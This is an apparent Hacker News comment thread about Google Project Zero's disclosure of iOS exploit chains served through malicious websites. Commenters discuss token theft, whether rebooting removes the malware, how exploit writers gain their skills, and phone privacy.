Just important to note that restarting the device is not the end of it. "Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device."

I would recommend checking your login history / OAuth permissions to anything you had in your keychain, changing passwords for anything critical you used on your device if you suspect you were infected, a restart won't undo stolen information.


If you have restarted your iPhone at any point, it will wipe the malware.


I literally don't understand how do you get the knowledge to write an exploit like this. I'm a c++ programmer working on game engines, so manual memory management is my bread and butter, you have to have a detailed understanding of the underlying hardware architecture to do this job, but I don't understand how you go from where I am to writing a low level exploit like this.


fuzzing using something like AFL possibly?

http://lcamtuf.coredump.cx/afl/


I must be missing some core concepts here. How is it possible to get arbitrary objective-c code running on your iOS device simply by visiting a web site? EDIT: found the discussion: https://googleprojectzero.blogspot.com/2019/08/jsc-exploits....


From about 2016-2018 I was wondering why my iMessages became fodder for strangers to parrot back to me at coffee shops in the small USA town in which I was living. Of course, I explored the idea that the other parties of these iMessage conversations (usually thousands of miles away with no apparent connection to people in my locale) had somehow betrayed me. This was likely not the case, as I confronted those parties and they adamantly denied discussing or sharing our conversations.

It’s likely that my devices were owned and on display for hackers in my local community. This article is a reminder of the trauma experienced as a result of the paranoia and mistrust I experienced, and a reminder that we are not to trust our consumer devices to really care about our privacy.

If Apple cared about user security they’d build robust defenses into the devices that empower the end user to have a degree of confidence regarding security. Instead, the iPhone on which I’m typing could be at this time could be 100% owned and leaking data in real time and I’m afforded no visual indication of that possibility. The camera and microphone could be hot and transmitting and Apple refuses to offer any way to confirm this in a robust, hardware-visual, unhackable way. That computer camera activity led’s can be hacked (or could be in previous iterations) is indicative of the level of irresponsibility going on.

The blob that is the combination of a modem that interacts with cell towers, and the vastly complex computer tied to it, affords zero insight into what the phone is doing or whether it is betraying me.

And, such privacy breaches are enough to ruin lives. World is full of malicious folks who enjoy hurting others if they can get away with it.


I’m sorry, what? Strangers at coffee shops in your small town would read your private iMessages to which they somehow had access? That makes literally 0 sense.

- how did they know your name / for whom to look up these hacked messages? - how did they know where to find these hacked messages? - why would they reveal their ability to watch your every move by repeating your private messages? - even if they had all of these capabilities and no shame about letting you know, why on earth would they care enough to look at your messages?

The scenario you’re convinced happened sounds completely bizarre, and gives me some strong Terry Davis vibes (no disrespect to him - that’s the person he became due to his illness).


You sound like you might also be interested in the Librem 5 phone coming out this year.


So as an iPhone user, is it time to go into my password manager and generate new passwords for all my logins?


>The root causes I highlight here are not novel and are often overlooked: we'll see cases of code which seems to have never worked, code that likely skipped QA or likely had little testing or review before being shipped to users.

So similar to Stagefright?


> It’s difficult to understand how this error could be introduced into a core IPC library that shipped to end users. While errors are common in software development, a serious one like this should have quickly been found by a unit test, code review or even fuzzing. It’s especially unfortunate as this location would naturally be one of the first ones an attacker would look, as I detail below.

Wow Google. Like I applaud the Project Zero program and its goals but you never write this sort of stuff when discussing your android vulnerabilities. This is just petty.


Very informative writeup! I'm curious if there is a way to see which devices have been affected by these exploits.

After reading the disclosure policy, this vulnerability must have been fixed already. I'm guessing this has been fixed in iOS 12.4 or even before?


I'm always impressed by Google's Project Zero team, but I'm also impressed by abilities of the implementer(s).

What's interesting is that (for most of these cases) I find that I can understand the process of the reverse engineering, but I am completely stupefied as to the process of the initial implementation. I understand finding relatively superficial vulnerabilities (e.g., an SQL injection attack [1]), but I don't understand how these vulnerabilities are found when they are so many layers deep.

If anyone has an insight I would really appreciate it.

1. https://xkcd.com/327/


I mean that's the thing, they're layers deep but those layers can largely be approached individually, and swapped as needed.

You don't have to wait until you find a JS exploit to start work on a payload achieving further privilege escalation, you use existing development tools and privileges.

And what's really so different in concert between SQL injection and the lack of proper checks on the binary data header field in the beginning of the first post?

One of the latter posts in the linked series goes through how the initial stage stuff is in one case taken verbatim from the JS test case in the webkit commit fixing the bug (and only reaching users months later).

(Not at all saying it's not incredibly impressive or that I could do any of it, haha)


Do we have any idea at all about how many users were affected?


Ugh. Blogspot does not render well on mobile for me.


Time for widespread adoption of mobile EDR.


Would the extra attack surface from third-party apps looking at sensitive system data outweigh the benefits from an EDR solutions?

Poking a hole in the sandbox for "security" or "auditing" seems a bit risky.


Mobile EDR is not going to help consumers, especially not when attacker has a kernel write primitive.


How exactly were these websites able to install this malicious code?


The P0 guys have a whole article about that: https://googleprojectzero.blogspot.com/2019/08/jsc-exploits....


They exploited bugs in Safari.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: